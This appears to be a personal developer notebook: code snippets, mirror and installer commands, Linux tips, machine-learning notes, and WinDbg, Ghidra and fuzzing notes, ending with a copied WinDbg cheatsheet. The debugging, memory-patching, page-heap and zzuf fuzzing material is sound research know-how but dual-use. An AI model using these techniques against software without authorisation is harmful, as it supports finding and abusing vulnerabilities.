Lan
how to write test
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_123() {
// ...
}
}
#[test]
fn test_123() {
// ...
}
string to int
Atoi (string to int) and Itoa (int to string).
i, err := strconv.Atoi("-42")
s := strconv.Itoa(-42)
go build x86 on x64
GOARCH=386 GOOS=windows go build
run direct | python main.py
import sys
def main():
filepath = sys.argv[1]
if __name__ == '__main__':
main()
md5
import hashlib
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
file
outF = open("myOutFile.txt", "w") # write (create new)
outF = open("myOutFile.txt", "a") # append
# write
outF.write("abc")
outF.write("\n")
outF.writelines(["aa","bb"]) # 写很多行
# read
outF.read(1024) # read 1024 bytes
outF.read() # read all
outF.readlines() # TODO
# read line by line
for cnt, line in enumerate(fp):
print("Line {}: {}".format(cnt, line))
# close to clean up
outF.close() # need to close
# use context open
with open(out_filename, 'w') as out_file:
out_file.write("xx")
error
try:
print("Hello")
except NameError:
print("Variable x is not defined")
except:
print("Something else went wrong")
else:
print("Nothing went wrong")
finally:
print("The 'try except' is finished")
dir (directory)
import os
for dir in os.listdir():
pass
subprocess
一个运行命令的「框架」,带超时,同时捕获 stdout and stderr
- subprocess.run 的第一个参数必须是数组
- timeout 单位是秒
- stdout=PIPE, stderr=STDOUT 的作用是把 stderr 重定向到 stdout,之后可以通过 sr.stdout 拿到输出
import os
import subprocess
from subprocess import *
for line in outfile:
try:
i = i+1
print("runing#{} {}".format(i,line))
sr = subprocess.run(["rabin2", "-I", line[:-1]], timeout=4, stdout=PIPE, stderr=STDOUT)
print(sr.stdout.decode("utf-8"))
except subprocess.TimeoutExpired:
print("timeout")
except:
print("unknow error")
python2 subprocess
https://stackoverflow.com/a/4760517
期望信息:stdout,stderr,status
import subprocess
p = subprocess.Popen(['ls', '-a'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = p.communicate()
status = p.returncode
build from cli
打开 visual studio prompt
csc a.cs
using System;
namespace HelloWorldApplication
{
class HelloWorld
{
static void Main(string[] args)
{
Console.WriteLine("Hello World");
Console.ReadKey();
}
}
}
fmt format string
string.Format("blabla: {0}", 123);
string.Format("blabla: {0:d}", 123);
switch
switch (somevar)
{
case 123:
// do something
// do more, no need bracket
break;
case 456:
case 457:
break;
default:
break;
}
file
// read file
string content = File.ReadAllText(path, Encoding.UTF8);
// write file
File.WriteAllText(curFile, "blabla");
other
frequently
pip
-i https://pypi.douban.com/simple/
-i https://pypi.tuna.tsinghua.edu.cn/simple
go
启用 Go Modules 功能
go env -w GO111MODULE=on
七牛
go env -w GOPROXY=https://goproxy.cn,direct
阿里云
go env -w GOPROXY=https://mirrors.aliyun.com/goproxy/,direct
goproxy
go env -w GOPROXY=https://goproxy.io,direct
查看:
go env | grep GOPROXY
安装:
curl https://dl.google.com/go/go1.23.4.linux-amd64.tar.gz -O
sudo rm -rf /usr/local/go && sudo tar -C /usr/local -xzf go1.23.4.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
npm
--registry=https://registry.npm.taobao.org
cargo
在 $HOME/.cargo/config 中添加如下内容:
# ~/.cargo/config
[source.crates-io]
replace-with = 'rsproxy-sparse'
[source.rsproxy]
registry = "https://rsproxy.cn/crates.io-index"
[source.rsproxy-sparse]
registry = "sparse+https://rsproxy.cn/index/"
[registries.rsproxy]
index = "https://rsproxy.cn/crates.io-index"
[net]
git-fetch-with-cli = true
或者:
[source.crates-io]
replace-with = 'ustc'
# 如果所处的环境中不允许使用 git 协议,可以把上述地址改为:
[source.ustc]
registry = "https://mirrors.ustc.edu.cn/crates.io-index"
# registry = "git://mirrors.ustc.edu.cn/crates.io-index"
install docker
curl -fsSL https://get.docker.com | bash -s docker
rustup (install rust)
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
使用代理:
export RUSTUP_DIST_SERVER="https://rsproxy.cn"
export RUSTUP_UPDATE_ROOT="https://rsproxy.cn/rustup"
curl --proto '=https' --tlsv1.2 -sSf https://rsproxy.cn/rustup-init.sh | sh
nvm
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
ubuntu
git
git log -p main.c:查看单个文件的 git 历史记录
kde部分应用中文输入
使用 Fcitx 之前,您必须先设置一些环境设定变量:
如果您用 KDM, GDM, LightDM 等显示管理器,请在 ~/.xprofile 中加入以下代码;如果您用 startx 或者 Slim 启动,即使用 .xinitrc 的场合,则改在 ~/.xinitrc 中加入:
export GTK_IM_MODULE=fcitx
export QT_IM_MODULE=fcitx
export XMODIFIERS="@im=fcitx"
http://newstart.farbox.com/post/articles/fcitx
mysql
https://wiki.archlinux.org/index.php/MariaDB
已经设置了一个用户kk
MariaDB [xxx]> GRANT ALL ON xxx.* TO 'kk'@'127.0.0.1' IDENTIFIED BY 'sss' WITH GRANT OPTION;
kde shortcut
C-: choose from clipboard history
wireguard
配置文件放在 /etc/wireguard/wg0.conf 里面
使用 wg-quick up wg0 来启用 Interface, 使用 wg-quick down wg0 来关闭。
使用 systemctl enable wg-quick@wg0 来自动启动。
route: how to use two card (not worked)
route add -net 192.168.62.0 netmask 255.255.255.0 gw 192.168.1.1
route add -net 10.10.40.0 netmask 255.255.255.0 gw 10.10.30.1
http://10.10.40.11
10.10.30.164
wlp0s20f0u11
ip route add 10.10.40.0/24 via 10.10.30.164 dev wlp0s20f0u11
# ok
~/w/tmp [2]> sudo ip route del default via 192.168.0.1
[sudo] xx 的密码:
~/w/tmp> ping 10.10.40.11
PING 10.10.40.11 (10.10.40.11) 56(84) bytes of data.
sudo ip route add 10.10.40.0/24 via 10.10.30.254 dev wlp0s20f0u11
yay cache
err: HTTP server doesn't seem to support byte ranges. Cannot resume
忽略缓存重新下载: 在询问 clean build 的时候选择 [A]ll
==> Packages to cleanBuild?
==> [N]one [A]ll [Ab]ort [I]nstalled [No]tInstalled or (1 2 3, 1-3, ^4)
==>
firefox
change scroll bar to left
- input about:config in address bar
- search and change layout.scrollbar.side to 3
- restart (must?)
vnc
black screen use the default config
https://www.reddit.com/r/ManjaroLinux/comments/g7vs5i/black_screen_when_i_vnc_into_manjaro_guest_kde/
Deleted everything in the ~/.vnc/xstartup file and added
dbus-launch startplasma-x11
vncserver -geometry 1600x1200 -randr 1600x1200,1440x900,1024x768
xrandr
xrandr -s 800x600
bash
循环做事
#TLDR
for i in {1..10}; do echo "abc"; done;
# example
for i in {1000..3000}; do for f in example.*; do zzuf -r 0.01 -s $i < "$f" > "$i-$f"; done; done
stdout and stderr pipe to both terminal and file
sh any.sh 2>&1 | tee output.txt
sh any.sh 2>&1 | tee -a output.txt
上次命令的返回状态
echo $?
vim
basic settings
限制最大列数
:set colorcolumn=80
python tabs
set expandtab " enter spaces when tab is pressed
set textwidth=120 " break lines when line length increases
set tabstop=4 " use 4 spaces to represent tab
set softtabstop=4
set shiftwidth=4 " number of spaces to use for auto indent
set autoindent " copy indent from current line when starting a new line
" make backspaces more powerfull
set backspace=indent,eol,start
vim-plug
install
curl -fLo ~/.vim/autoload/plug.vim --create-dirs \
https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
config
call plug#begin('~/.vim/plugged')
Plug 'scrooloose/nerdtree', { 'on': 'NERDTreeToggle' }
call plug#end()
then :source % and :PlugInstall
coc.nvim
install node
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
nvm install 11
edit ~/.vimrc
Plug 'neoclide/coc.nvim', {'branch': 'release'}
:PlugInstall
edit ~/.vimrc
" GoTo code navigation.
nmap <silent> gd <Plug>(coc-definition)
nmap <silent> gy <Plug>(coc-type-definition)
nmap <silent> gi <Plug>(coc-implementation)
nmap <silent> gr <Plug>(coc-references)
" Use K to show documentation in preview window.
nnoremap <silent> K :call <SID>show_documentation()<CR>
function! s:show_documentation()
if (index(['vim','help'], &filetype) >= 0)
execute 'h '.expand('<cword>')
elseif (coc#rpc#ready())
call CocActionAsync('doHover')
else
execute '!' . &keywordprg . " " . expand('<cword>')
endif
endfunction
C/C++
apt install ccls
edit config file via :CocConfig
{
"languageserver": {
"ccls": {
"command": "ccls",
"filetypes": ["c", "cpp", "cuda", "objc", "objcpp"],
"rootPatterns": [".ccls-root", "compile_commands.json"],
"initializationOptions": {
"cache": {
"directory": ".ccls-cache"
},
"client": {
"snippetSupport": true
}
}
}
}
}

Q: 如何修改内存?
这里的d是修改的宽度
ed 0xe750f50 42424242
Q: ghidra rebase program
To rebase a binary in Ghidra via the GUI: Window -> Memory Map -> Set Image Base button (far right house icon). https://twitter.com/_argp/status/1167359147211251713
Q: ghidra 高亮变量
鼠标中键 https://github.com/NationalSecurityAgency/ghidra/issues/25
Q: 搜索内存:
0:013> s -a 0 L?80000000 "defines Annotatio"
0ac44ce3  64 65 66 69 6e 65 73 20-41 6e 6e 6f 74 61 74 69  defines Annotati
0e63a0e2  64 65 66 69 6e 65 73 20-41 6e 6e 6f 74 61 74 69  defines Annotati
0e90414c  64 65 66 69 6e 65 73 20-41 6e 6e 6f 74 61 74 69  defines Annotati
Q: gflags
"D:\Windows Kits\10\Debuggers\x86\gflags.exe" -i FoxitPDFReader.exe +hpa
实验:在win10上,搜索内存反查,失败,heap指令不生效就算用老版+hpa也不行
Q: 格式化打印
.printf "filename: %mu \n", poi(@esp+4)
- 宽字符串 %mu
- 字符串 %ma
和断点结合时,命令字符串内部的引号和反斜杠需要转义(\" 和 \\)
bp kernel32!CreateFileW ".printf \"filename: %mu \\n\", poi(@esp+4);kv;gc;"
Q: 条件断点之字符串
实例:打开某个特定文件名时断下
bp kernel32!CreateFileW "as /mu $FileName poi(@esp+0x4);.block{r @$t0=$scmp(@\"$FileName\", @\"G:\\clean\\2023-07\\2023-07-21-mesos\\mesos-master\\links_highlights_annots.pdf\");.if(0!=@$t0){gc;}}"
Q: 使用 drrun.exe 收集
G:\clean\2023-07\2023-07-cov-ghidra>D:\working\wafl-play\DynamoRIO-Windows-8.0.18752\bin64\drrun.exe -t drcov -- test_cov.exe
Q: 显示某个地址对应的函数
0:000> uf 751318fc
KERNEL32!_imp__SleepEx:
751318fc 40 inc eax
751318fd c3 ret
0:000> uf 751318fd
KERNEL32!_imp__SleepEx+0x1:
751318fd c3 ret
gpt的推理、训练、fine-tuning分别是什么意思
The terms "inference," "training," and "fine-tuning" are fundamental concepts in the field of machine learning and natural language processing. Here's a detailed explanation of each term:
术语“推理”、“训练”和“微调”是机器学习和自然语言处理领域的基本概念。 以下是每个术语的详细解释:
推理: 含义: 推理是指使用经过训练的模型根据新的输入数据进行预测或生成输出的过程。 当模型被部署并用于执行回答问题、完成提示或生成文本等任务时,它正在参与推理。 示例: 使用 GPT-3 等预先训练的语言模型来生成类似人类的文本来响应给定的提示,这就是推理的一个示例。
训练: 含义: 训练涉及通过向机器学习模型提供大量标记数据并允许其学习数据中的模式和关系来教授机器学习模型的过程。 该模型在训练期间调整其内部参数,以最小化其预测与训练数据中的实际标签之间的差异。 示例: 在文本段落数据集上训练语言模型,以学习人类语言的统计模式和结构。
微调: 含义: 微调,也称为迁移学习,涉及采用预先训练的模型并在特定数据集或任务上对其进行进一步训练,以使其适应新领域或提高其在特定类型数据上的性能。 示例: 在包含火星城市信息的数据集上微调 GPT-3 等预训练语言模型,使其能够针对有关火星城市的问题生成准确且相关的答案。
https://devv.ai/en/search?threadId=d669udyldpmo
LoRA
quantization (量化)
context: You can run 70B LLAMA on dual 4090s/3090s with quantization.
context 2: No, they can't run it. llama 70 with 4 bit quantization takes ~50 GB VRAM for decent enough context size. You need A100, or 2-3 V100 or 4 3090 which all costs roughly roughly $3-5/h
GGML 和 GGUF
GGML 是创建用于存储 GPT 模型的文件格式的早期尝试。
GGUF 旨在解决 GGML 的局限性并改善整体用户体验。
GGUF是一种二进制格式,旨在实现快速加载和保存大语言模型,并易于阅读。原来模型是用pytorch保存, 我有的时候也转换成onnx. 但是,想在LLAMA.CPP上跑, 就要用GGUF格式.
Use cases
fine-tune
https://github.com/brevdev/notebooks/blob/main/llama2-finetune-own-data.ipynb 一些notebook实践
https://news.ycombinator.com/item?id=37484135 精读
hardware
是的,3090 是本地(local)AI 社区的一个梗(meme)。 此外,它的软件支持也非常好,因为它的架构与 A100 基本相同。
3060 也很受欢迎,它是 3090 的一半。
https://news.ycombinator.com/item?id=38589520
George Hotz | Programming | Mistral mixtral on a tinybox | AMD P2P multi-GPU mixtral-8x7b-32kseqlen 1:24:11 / 2:37:51
llama
git clone --depth=1 https://github.com/ggerganov/llama.cpp
cd llama.cpp/
make
Q:/Downloads/ai/llama.cpp $ ./main.exe -m "Q:\Downloads\mistral-7b-instruct-v0.1.Q4_K_M.gguf" -p "golang and zig" -n 400 -e
SGD
提供一种 SGD 方法,该方法 实现随机梯度下降
sophisticated algorithm ≤ simple learning algorithm + good training data.
>>> import mnist_loader
>>> training_data, validation_data, test_data = mnist_loader.load_data_wrapper()
>>> import network
>>> net = network.Network([784, 30, 10])
>>> net.SGD(training_data, 30, 10, 3.0, test_data=test_data)
Epoch 0: 9058 / 10000, took 8.89 seconds
Epoch 1: 9197 / 10000, took 8.88 seconds
反向传播算法
反向传播算法最初是在 20 世纪 70 年代提出的,但直到 1986 年大卫·鲁梅尔哈特(David Rumelhart)、杰弗里·辛顿(Geoffrey Hinton)和罗纳德·威廉姆斯(Ronald Williams)发表那篇著名的论文之后,它的重要性才被充分认识。该论文描述了若干神经网络,在这些网络上反向传播比以前的学习方法快得多,使得用神经网络解决以前无法解决的问题成为可能。今天,反向传播算法是神经网络学习的主力。
反向传播算法是神经网络训练的关键步骤,通过该算法可以有效地调整神经网络的参数(权重和偏置),以使其逼近期望的输出。该算法的工作原理可以简单概括如下:
前向传播:首先,通过神经网络的前向传播,将输入数据从输入层经过隐藏层传播到输出层,得到模型的预测输出。
计算损失:将模型的预测输出与实际期望输出进行比较,计算损失函数(cost function)(如均方误差或交叉熵(cross-entropy)),用于衡量模型预测的准确程度。
反向传播:根据损失函数,利用链式法则计算损失函数对神经网络中各层参数(权重和偏置)的梯度。这些梯度表示了损失函数对参数的变化敏感程度。
参数更新:根据梯度下降算法,通过不断迭代,以最小化损失函数为目标,逐步调整神经网络中的参数,使得模型的预测输出逐渐逼近期望输出。
反向传播算法的关键在于通过计算损失函数对参数的梯度,实现了对神经网络参数的自动调整,从而提高了神经网络的准确性和泛化能力。
an: 增加了负反馈调节
过拟合
过拟合是指机器学习模型在训练数据上表现良好,但在新数据上表现不佳的不良行为。这种情况发生时,模型会过于复杂,以至于记住了训练数据中的噪音和随机波动,而无法很好地泛化到新的数据集上。过拟合通常是由于训练数据量太小、包含大量无关信息、训练时间过长或模型复杂度过高等原因引起的。
为了检测过拟合,可以使用K折交叉验证等方法。K折交叉验证将训练集等分成K个子集,然后进行K次迭代训练和验证,最终得到模型的平均性能评估。
为了避免过拟合,可以采取一些方法,比如提前停止训练、增加训练数据、数据增强、特征选择、正则化和集成学习等。这些方法有助于降低模型的复杂度,减少噪音的影响,从而提高模型的泛化能力。
an: 原因:前摇过长。 解决方法:尽早引入考试和验证,及时纠错
避免过拟合:Regularization 正则化
Regularization是机器学习中用来避免过拟合的一种技术。过拟合指的是模型在训练数据上表现良好,但在新数据上表现不佳的情况。Regularization通过对模型的复杂度进行惩罚,来防止模型学习训练数据中的噪声,从而提高模型的泛化能力。
在Regularization中,有两种常见的方法:Ridge Regression和Lasso Regression。Ridge Regression通过向损失函数中添加一个收缩量来修改残差平方和,从而对模型的灵活性进行惩罚。而Lasso Regression则使用绝对值的惩罚来限制模型的复杂度。
这些Regularization技术有助于减少模型的方差,提高模型的泛化能力,而不会显著增加模型的偏差。通过调整Regularization的参数,可以控制对模型偏差和方差的影响,从而在避免过拟合的同时保持模型的重要特性。
除了Ridge Regression和Lasso Regression,Regularization还可以应用于稀疏性正则化、半监督学习和多任务学习等领域。这些Regularization技术的应用有助于提高模型的稳定性和泛化能力,是机器学习中重要的技术手段之一。
an: 减少模型的复杂性
评分函数(score function)和损失函数(loss function)
概述。我们现在将开发一种更强大的图像分类方法,最终将自然地扩展到整个神经网络和卷积神经网络。该方法将有两个主要组成部分:将原始数据映射到类别分数的分数函数(score function),以及量化预测分数和真实标签之间的一致性的损失函数(loss function)。然后,我们将其视为一个优化问题,目标是更新score function的参数来最小化loss function
gpu choice
RTX 2070 https://www.thepaper.cn/newsDetail_forward_22138632
3080和4070Ti https://timdettmers.com/2018/12/16/deep-learning-hardware-guide/
Adam
https://github.com/kartik4949/tinygrad/commit/26ce2d93c3b8da2eed3ed0620212628e7dcfc459
George Hotz | Programming | tinygrad and more neural networks from scratch | Part1 直播: https://www.youtube.com/watch?v=Xtws3-Pk69o 35:51
Adam是一种 优化算法 ,用于更新神经网络权重。它是一种替代传统随机梯度下降程序的优化算法。Adam算法是由OpenAI的Diederik Kingma和多伦多大学的Jimmy Ba在2015年的ICLR论文中提出的。Adam算法的名称源自自适应矩估计(adaptive moment estimation)。Adam算法的优点包括易于实现、计算效率高、内存需求低、适用于大规模数据和参数、适用于非平稳目标、适用于梯度非常嘈杂或稀疏的问题。Adam算法与传统的随机梯度下降不同,它维护每个网络权重的学习率,并在学习过程中分别进行调整。Adam算法结合了AdaGrad和RMSProp的优点,通过计算梯度的一阶矩和二阶矩的指数移动平均值来计算不同参数的自适应学习率。Adam算法在实践中表现良好,与其他随机优化方法相比效果显著。在深度学习领域,Adam算法被广泛应用,并被推荐作为默认的优化方法。
Dropout
https://github.com/tinygrad/tinygrad/commit/d901ef6b23f76205ad8d47679b75dd0342ef7626 引入tinygrad (Dec 13, 2020)
https://www.cs.toronto.edu/~rsalakhu/papers/srivastava14a.pdf p5 算法
Bernoulli random 0-1随机
Dropout是一种用于深度学习神经网络的正则化方法。在训练过程中,Dropout会随机丢弃神经网络中的一些节点,以防止过拟合。过拟合是指模型在训练数据上表现良好,但在测试数据上表现不佳的情况。Dropout通过随机丢弃节点,使得每次训练时网络的结构都不同,从而增加了模型的鲁棒性,减少了过拟合的风险。
在实践中,Dropout可以通过在每个隐藏层中随机丢弃一定比例的节点来实现。这样做可以使得网络在训练过程中变得更加嘈杂,迫使每个节点以概率性的方式承担更多或更少的输入责任。这种概念表明,Dropout可以打破网络层之间的相互适应,从而使模型更加健壮。
在使用Dropout时,需要设置一个保留概率 p(丢弃概率为 1 - p),用于指定训练过程中每个节点被保留的概率。通常情况下,对于隐藏层的节点,保留概率可以选择0.5,而对于输入层的节点,通常会选择接近1的保留概率(例如0.8),即输入层只丢弃很少的节点。在训练结束后,需要对网络的权重进行重新缩放(乘以保留概率 p),以便在进行预测时能够得到正确的结果。
总的来说,Dropout是一种简单而有效的正则化方法,可以帮助减少过拟合,提高深度神经网络的泛化能力。
generate from exist table
python manage.py inspectdb <tbl_name>... > models.py
mysql support issue
django.db.utils.NotSupportedError: MySQL 8.0.11 or later is required (found 5.7.20).
for old mysql version, use django4.1
pip3 install django==4.1
mysql lib error on centos
rpm --import https://repo.mysql.com/RPM-GPG-KEY-mysql-2022
yum -y install mysql-devel
pip install mysqlclient -i https://pypi.douban.com/simple/
export LD_LIBRARY_PATH=/usr/lib64/mysql/
中文字体:https://github.com/lxgw/LxgwWenKai-Lite/releases
英文字体:Jetbrains Mono
security
WinDbg cheatsheet
origin link: https://github.com/hugsy/defcon_27_windbg_workshop/blob/master/windbg_cheatsheet.md
Content
- WinDbg cheatsheet
Setup
Symbol Path
In a command prompt:
C:\> setx _NT_SYMBOL_PATH srv*C:\Symbols*https://msdl.microsoft.com/download/symbols
In WinDbg, Ctrl+S then
srv*C:\Symbols*https://msdl.microsoft.com/download/symbols
Providers
In WinDbg
0:000> .scriptproviders
Should display something like
Available Script Providers:
NatVis (extension '.NatVis')
JavaScript (extension '.js')
VS Code linting
Download JsProvider.d.ts to the root of your script and add the following at its top:
/// <reference path="JSProvider.d.ts" />
"use strict";
Kernel Debugging
- Increase the kernel verbosity level from calls to KdPrintEx()
- temporarily during runtime from WinDbg (lost once session is closed)
kd> ed nt!Kd_Default_Mask 0xf
- permanently from registry hive (in Admin prompt on Debuggee)
C:\> reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter" /v DEFAULT /t REG_DWORD /d 0xf
Commands
Basic commands
| Action | Command | Examples |
|---|---|---|
| Help / Manual | .hh <command> | .hh<br>.hh !process |
| Clear screen | .cls | |
| Dynamic evaluation | ? | ? 40004141 - nt<br>? 2 + 2<br>? nt!ObTypeArrayIndex |
| Comment | $$ | $$ this is a useful comment |
| Print a string | .echo | .echo "Hello world" |
| Print a formatted string (see printf formatters) | .printf | .printf "Hello %ma\n" , @$esp |
| Command separator | ; | command1 ; command2 |
| Attach (Detach) to (from) process | .attach | .detach |
| Display parameter value under different formats (hexadecimal, decimal, octal) | .formats | .formats 0x42 |
| Change default base | n | n 8 |
| Quit WinDbg (will kill the process if not detached) | q | |
| Restart debugging session | .restart | |
| Reboot system (KD) | .reboot | |
.printf formatters
| Description | Formatter | Examples |
|---|---|---|
| ASCII C string (i.e. NULL terminated) | %ma | |
| Wide C string (i.e. NULL terminated) | %mu | |
| UNICODE_STRING** string | %msu | |
| Print the symbol pointed by address | %y | .printf “%y\n”,ffff8009bc2010 // returns nt!PsLoadedModuleList |
| Print a Pointer | %p | .printf “%p\n”,nt!PsLoadedModuleList // returns 0xffff8009bc2010 |
Execution flow
| Action | Command | Examples |
|---|---|---|
| Start or resume execution (go) | g | |
| Dump register(s) | r | r<br>r eax<br>r rax=42 |
| Step over | p | pa 0xaddr (step over until 0xaddr is reached)<br>pt (step over until return)<br>pc (step over until next call) |
| Step into | t | Same as above, replace p with t |
| Execute until reaching current frame return address (go upper) | gu | |
| List module(s) | lm | lm (UM: display all modules)<br>lm (KM: display all drivers and sections)<br>lm m *MOD* (show module with pattern 'MOD') |
| Get information about current debugging status | .lastevent<br>!analyze | |
| Show stack call | k<br>kp | |
Registers / Memory access
| Action | Command | Examples |
|---|---|---|
| Read memory As | bytes: db<br>word: dw<br>dword: dd<br>qword: dq<br>pointer: dp<br>unicode string: dW | db @sp 41 41 41 41<br>dw @rip<br>dd @rax l4<br>dyb @rip<br>dps @esp<br>dW @rsp |
| Write memory As | bytes: eb<br>word: ew<br>dword: ed<br>qword: eq<br>ascii string: ea<br>Unicode string: eu | ea @pc "AAAA" |
| Read register(s) | r<br>r [[REG0],REG1,...] | r rax,rbp |
| Write register(s) | r [REG]=[VALUE] | r rip=4141414141414141 |
| Show register(s) modified by the current instruction | r. | |
| Dump memory to file | .writemem | .writemem C:\mem.raw @eip l1000 |
| Load memory from file | .readmem | .readmem C:\mem.raw @rip l1000 |
| Dump MZ/PE header info | !dh | !dh kernel32<br>!dh @rax |
| Read / write physical memory (syntax similar to dX/eX commands) | !db / !eb !dw / !ew !dd / !ed !dq / !eq | |
| Fill / Compare memory | f<br>c | f @rsp l8 41<br>c @rsp l8 @rip |
| Dereference memory | poi(<AddrOrSymbol>): dereference pointer size<br>dwo(): dereference DWORD<br>qwo(): dereference QWORD | db poi( @$rax ) |
Memory search
| Action | Command | Examples |
|---|---|---|
| Search | byte: s [RANGE] [VALUE]<br>dword: s -d [RANGE] [DWORD_VALUE] | s @eip @eip+100 90 90 90 cc<br>s -d @eax l100 41424344 |
| Search ASCII (Unicode) | s -a <AddrStart> L<NbByte> "Pattern"<br>s -a <AddrStart> <AddrEnd> "Pattern"<br>(for Unicode: change -a with -u) | |
| Search for pattern in command | .shell | .shell -ci "<windbg command>" batch command<br>.shell -ci "!address" findstr PAGE_EXECUTE_READWRITE |
Breakpoints
| Action | Command | Examples |
|---|---|---|
| Examine | x | x nt!*CreateProcess* |
| Display types | dt | dt ntdll!_PEB @$peb<br>dt ntdll!_TEB -r @$teb |
| Display Type Extended - with Debugger Object Model | dtx | dtx nt!_PEB 0x000008614a7a000<br>which is equivalent to dx (nt!_PEB*)0x000008614a7a000 |
| Set breakpoint | bp<br>bp 0xaddr (or mod!symbol) | |
| List breakpoints | bl | |
| Disable breakpoint(s) | bd [IDX] (IDX is returned by bl) | bd 1<br>bd * |
| Delete breakpoint(s) | bc [IDX] (IDX is returned by bl) | bc 0<br>bc * |
| (Un)Set exception on event | sx | sxe ld mydll.dll |
| Break on memory access | ba | ba r 4 @esp |
| Define breakpoint command | bp … [Command]<br>Where [Command] can be<br>- an action: "r ; g"<br>- a condition: ".if (@$rax == 1) {.printf \"rcx=%p\\\n\", @rcx }" | bp kernel32!CreateFileA "da @rcx; g" |
| Enable breakpoint after N hit(s) | bp <address> N+1 | bp /1 0xaddr (temporary breakpoint)<br>bp 0xaddr 7 (disable after 6 hits) |
| Set "undefined" breakpoint | bu <address> | |
Symbols
| Action | Command | Examples |
|---|---|---|
| Examine | x | x /t /v ntdll!*CreateProcess* |
| Display types | dt | dt ntdll!_PEB @$peb |
| List nearest symbols | ln | ln 0xaddr |
| Set/update symbol path | .sympath | |
| Load module symbols | ld | ld Module<br>ld * |
Convenience variables and functions
| Action | Command | Examples |
|---|---|---|
| Program entry point | $exentry | bp $exentry |
| Process Environment Block | $peb | dt _PEB @$peb |
| Thread Environment Block | $teb | dt _TEB @$teb |
| Return Address | $ra | g @$ra |
| Instruction Pointer | $ip | |
| Size of Page | $pagesize | |
| Size of Pointer | $ptrsize | |
| Process ID | $tpid | |
| Thread ID | $tid | |
Useful extensions
| Action | Command | Examples |
|---|---|---|
| Detailed information about loaded DLLs | !dlls<br>!dlls -I (show load order)<br>!dlls -c 0xaddr (show DLL containing 0xaddr) | |
| Get mapping information | !address | !address -f:MEM_COMMIT |
| Change verbosity of symbol loader | !sym | !sym noisy<br>!sym quiet |
| Dump PEB/TEB information | !peb !teb | |
| Analyze the reason of a crash | !analyze | !analyze -v |
| Convert an NTSTATUS code to text | !error | !error c0000048 |
| Perform heuristic checks to the exploitability of a bug | !exploitable | |
| Encode/decode pointer encoded by KernelBase API EncodePointer() | !encodeptr32 (or 64)<br>!decodeptr32 (or 64) | |
| Display the current exception handler | !exchain | |
| Dump UM heap information | !heap | |
.NET Debugging
| Action | Command | Examples |
|---|---|---|
| Load the CLR extensions | .loadby sos clr | sxe ld clr; g to make sure clr.dll is loaded, then .loadby sos clr |
| Get help | !help | |
| Set managed code breakpoint | !bpmd <module> Path.To.Function | !bpmd mscorlib.dll System.Reflection.Assembly.Load !bpmd System.dll System.Diagnostics.Process.Start !bpmd System.dll System.Net.WebClient.DownloadFile |
| List all managed code breakpoints | !bpmd -list | |
| Clear specific managed code breakpoint | !bpmd -clear $BreakpointNumber | |
| Clear all managed code breakpoints | !bpmd -clearall | |
| Dump objects | !DumpObj | !DumpObj /d 0x<address> |
| Dump the .NET stack | !CLRStack | !CLRStack -p |
LINQ & Debugger Data Model
Variables
| Variable description | Command | Examples |
|---|---|---|
| Create a variable | dx @$myVar = VALUE | dx @$ps = @$cursession.Processes |
| Delete a variable | dx @$vars.Remove("VarName") | dx @$vars.Remove("ps") |
| List user defined variable | dx @$vars<br>dx Debugger.State.UserVariables | |
| Bind address Address to a N-entry array of type T | dx (T* [N])0xAddress | dx (void** [5]) Debugger.State.PseudoRegisters.General.csp |
Functions
| Function description | Command | Examples |
|---|---|---|
| Create a "lambda" inline function | dx @$my_function = ([arg0, arg1] => Code) | dx @$add = (x, y => x + y) |
| Filtering objects | [Object].Where( [FILTER PATTERN] ) | dx @$cursession.Processes.Where( x => x.Name == "notepad.exe") |
| Sorting objects | - asc: [Object].OrderBy([Sort Expression])- desc: [Object].OrderByDescending([Sort Expression]) | dx @$cursession.Processes.OrderByDescending(x => x.KernelObject.UniqueProcessId) |
| Projecting | .Select( [PROJECTION KEYS] ) | .Select( p => new { Item1 = p.Name, Item2 = p.Id } ) |
| Access n-th element of iterable | $Object[n] | @$cursession.Processes[4] |
| Get the number of objects in iterable | $Object.Count() | @$cursession.Processes.Count() |
| Create an iterator from a LIST_ENTRY structure | dx Debugger.Utility.Collections.FromListEntry(Address, TypeAsString, "TypeMemberNameAsString") | dx @$ProcessList = Debugger.Utility.Collections.FromListEntry( *(nt!_LIST_ENTRY*)&(nt!PsActiveProcessHead), "nt!_EPROCESS", "ActiveProcessLinks")<br>dx @$HandleList = Debugger.Utility.Collections.FromListEntry( *(nt!_LIST_ENTRY*)&(nt!PspCidTable), "nt!_HANDLE_TABLE", "HandleTableList") |
| Apply a structure S to memory (dt-like) | dx (S*)0xAddress | dx (nt!_EPROCESS*)&@$curprocess.KernelObject |
| Format output data | dx <LinqObject>.ToDisplayString($format) where $format is a dx format specifier (e.g. "d" decimal, "x" hexadecimal, "su" wide string) | dx @$peb->ProcessParameters->ImagePathName.Buffer.ToDisplayString("su") |
WinDbg JavaScript reference
| Action | Command | Examples |
|---|---|---|
| Print message | host.diagnostics.debugLog(Message) | |
| Read data from memory | host.memory.readMemoryValues(0xAddr, Length) | |
| Read string from memory | host.memory.readString(0xAddr)<br>host.memory.readWideString(0xAddr) | |
| Evaluate expression | host.evaluateExpression([EXPR]) | var res=host.evaluateExpression("sizeof(_LIST_ENTRY)")<br>dx @$scriptContents.host.evaluateExpression("sizeof(_LIST_ENTRY)") |
| Resolve symbol | host.getModuleSymbolAddress(mod, sym) | var pRtlAllocateHeap = host.getModuleSymbolAddress('ntdll', 'RtlAllocateHeap'); |
| Dereference a pointer as an object | host.createPointerObject(...).dereference() | var pPsLoadedModuleHead = host.createPointerObject(host.getModuleSymbolAddress("nt", "PsLoadedModuleList"), "nt", "_LIST_ENTRY *"); |
| Create typed variable from address | host.createTypedObject(addr, module, symbol) | var loader_data_entry = host.createTypedObject(0xAddress,"nt","_LDR_DATA_TABLE_ENTRY") |
